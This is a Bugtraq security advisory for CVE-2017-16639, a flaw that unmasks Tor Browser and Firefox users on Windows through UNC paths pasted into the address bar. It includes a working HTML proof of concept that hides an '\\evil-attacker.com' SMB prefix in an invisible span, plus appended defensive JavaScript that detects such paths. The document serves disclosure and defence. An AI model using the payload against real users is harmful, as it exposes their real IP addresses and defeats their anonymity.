CVE-2017-16639 - Tor Browser Deanonymization With SMB
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: CVE-2017-16639 - Tor Browser Deanonymization With SMB
- From: Filippo Cavallarin <filippo.cavallarin@xxxxxxxxxxxxxxxx>
- Date: Wed, 12 Sep 2018 14:18:59 +0200
Advisory ID: SGMA18-002
Title: Tor Browser Deanonymization With SMB
Product: Tor Browser < 8.0, Firefox < 62 / < 60.2.0esr
Vendor: torproject.org, mozilla.org
Type: Information Disclosure
Risk level: 4 / 5
Credits: filippo.cavallarin@xxxxxxxxxxxxxxxx
CVE: CVE-2017-16639
Vendor notification: 2017-11-02
Vendor fix: 2018-09-05
Public disclosure: 2018-09-12
Details
Tor Browser version < 8.0 and Firefox version < 62 / < 60.2.0esr are affected
by an information disclosure vulnerability that allows remote attackers to
bypass the intended anonymity feature and discover a client IP address. The
vulnerability affects Windows users only and needs user interaction to be
exploited.
This is a different vulnerability from CVE-2017-16541, although the concept is
similar and it was reported by the same author.
The vulnerability exists because the affected browsers fail to block UNC paths
from being loaded via the address bar, which results in a connection to an
arbitrary SMB server.
The Universal Naming Convention (UNC) is the naming system used in Microsoft
Windows for accessing shared network folders and printers. By accessing a UNC
path it's possible to automatically mount a network share and access its
resources. For example, "dir \\evil-attacker.com\share\file" will connect to
evil-attacker.com using the SMB protocol and access the shared file.
When a UNC path is typed or pasted into the address bar the operating system
will immediately try to connect to the specified server bypassing the
configured proxy and revealing the true identity of the user. Note that the
connection is triggered as soon as the UNC path is pasted into the address bar
(without the need to hit the return key).
PoC
To exploit this vulnerability an attacker needs to trick the victim into
pasting a malicious UNC path into the address bar of their browser, and then
wait for SMB packets on the attacker-controlled server.
Of course it's not exactly easy to convince someone to paste untrusted text into
their browser's address bar, but some CSS may help. Consider the following
(valid) UNC path:
\\evil-attacker.com\share\http://trusted.site/
in an html page the path above can be written as
<span style="font-size:1px;opacity:0">\\evil-attacker.com\share\</span>http://trusted.site/
so it's displayed as
http://trusted.site/
Doing so, instead of tricking someone into pasting untrusted text, an attacker
may send victims to a website he/she controls and convince them to copy/paste a
plausible-looking URL.
At this point the attacker needs to be sure that the whole path is copied
including the small and invisible span at the beginning.
To do so he/she can use some CSS to change the mouse cursor to a "left-shifted"
one, so that the mouse selection starts a few pixels before the displayed
cursor. To make this sort of fake cursor an attacker needs a tool like GIMP to
create a transparent image 20 pixels wide and put the image of the
text-selection cursor on its right side.
A working PoC will look like this:
<style>
  * {
    cursor: url(shifted-cursor.cur), auto;
  }
</style>
<p>Please copy/paste the url below in the addressbar:</p>
<p><span style="font-size:1px;opacity:0">\\evil-attacker.com\share\</span>http://trusted.site/</p>
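The two defensive checks this advisory implies, as an added example that is not part of the original advisory or of Mozilla's fix: an address-bar input filter that refuses UNC paths (including the hidden-prefix trick in the PoC above) and a scanner that flags visually hidden spans carrying a UNC prefix in HTML. All function names and the sample HTML are constructed for this example.

```javascript
// Added example (not part of the advisory): reject UNC paths before they are
// treated as a URL, and flag hidden UNC prefixes in HTML.

// Match "\\host\share" with an optional remainder after the share name.
const UNC_RE = /^\s*\\\\([^\\\/\s]+)\\([^\\\/\s]+)(?:\\(.*))?$/s;

// Returns null when the text is not a UNC path; otherwise the parts an
// analyst would want to log (hostname the OS would contact, share, and the
// URL the victim believed they copied, if one is embedded).
function classifyPastedText(text) {
  const m = UNC_RE.exec(text);
  if (!m) return null;
  const [, host, share, rest = ''] = m;
  const urlMatch = /https?:\/\/\S+/.exec(rest);
  return {
    kind: 'unc',
    host,
    share,
    displayedUrl: urlMatch ? urlMatch[0] : null,
  };
}

// Generic address-bar guard: UNC paths are refused so the operating system
// never attempts an SMB connection outside the configured proxy.
function isSafeToNavigate(text) {
  return classifyPastedText(text) === null;
}

// Scan HTML for spans styled to be invisible (opacity:0 or a 0/1px font)
// whose content starts with a UNC prefix, i.e. the pattern in the PoC.
const HIDDEN_SPAN_RE = /<span[^>]*style\s*=\s*"([^"]*)"[^>]*>([^<]*)<\/span>/gi;

function findHiddenUncPrefixes(html) {
  const hits = [];
  for (const m of html.matchAll(HIDDEN_SPAN_RE)) {
    const [, style, content] = m;
    const hidden = /opacity\s*:\s*0(?![.\d])/i.test(style) ||
                   /font-size\s*:\s*[01](?:\.\d+)?px/i.test(style);
    if (hidden && /^\s*\\\\/.test(content)) hits.push(content.trim());
  }
  return hits;
}

// Constructed sample with the same shape as the PoC above.
const SAMPLE_HTML =
  '<p><span style="font-size:1px;opacity:0">\\\\evil-attacker.com\\share\\</span>http://trusted.site/</p>';
```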
Solution
Update Tor Browser to version >= 8.0
Update Firefox to version >= 62.0 or >= 60.2.0esr
References
https://www.torproject.org/
https://www.wearesegment.com/research/tor-browser-deanonymization-with-smb/